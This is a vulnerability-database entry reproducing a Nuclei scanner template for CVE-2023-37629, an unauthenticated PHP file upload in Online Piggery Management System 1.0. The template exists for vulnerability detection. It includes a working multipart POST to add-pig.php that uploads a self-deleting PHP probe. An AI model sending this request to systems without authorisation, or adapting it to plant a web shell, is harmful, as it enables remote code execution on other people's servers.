nuclei | ProjectDiscovery | NUCLEI:CVE-2023-37629
Aug 29, 2023 - 5:47 p.m.

Online Piggery Management System v1.0 - Unauthenticated File Upload

2023-08-29 17:47:46
ProjectDiscovery
github.com
Tags: cve2023, file upload, remote code execution, online piggery management system, intrusive, simple online piggery management system project

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 9.6
Confidence: High

EPSS: 0.12
Percentile: 95.4%

Online Piggery Management System 1.0 is vulnerable to unrestricted file upload (CWE-434). An unauthenticated user can upload a PHP file by sending a POST request to add-pig.php.

id: CVE-2023-37629

info:
  name: Online Piggery Management System v1.0 - Unauthenticated File Upload
  author: Harsh
  severity: critical
  description: |
    Online Piggery Management System 1.0 is vulnerable to File Upload. An unauthenticated user can upload a php file by sending a POST request to add-pig.php.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized access to the system, data leakage, or even complete compromise of the affected server.
  reference:
    - https://www.exploit-db.com/exploits/51598
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37629
    - https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
    - https://github.com/1337kid/Piggery_CMS_multiple_vulns_PoC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-37629
    cwe-id: CWE-434
    epss-score: 0.09817
    epss-percentile: 0.94811
    cpe: cpe:2.3:a:simple_online_piggery_management_system_project:simple_online_piggery_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: simple_online_piggery_management_system_project
    product: simple_online_piggery_management_system
  tags: cve2023,cve,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_project
variables:
  string: "CVE-2023-37629"

http:
  - raw:
      - |
        POST /pig/add-pig.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundary20kgW2hEKYaeF5iP

        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="pigno"

        pig-fms-100
        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="weight"

        65465
        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="arrived"

        {{date_time("%Y-%M-%D")}}
        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="gender"

        female
        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="status"

        active
        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="breed"

        2
        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="remark"

        4fwefwe
        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="pigphoto"; filename="{{rand_base(5)}}".php"
        Content-Type: application/x-php

        <?php echo md5("{{string}}");unlink(__FILE__);?>

        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="submit"


        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "successfully created")'
        condition: and
# digest: 4a0a0047304502206452761da1ebb71b5a2a85b17082354777b0f30a6d38f593ff0fd444629930430221008ec0e5895d41eaf6753d851aafa270e8bfdae54dc65c302ae5e25926af894564:922c64590222798bb761d5b6d8e72950
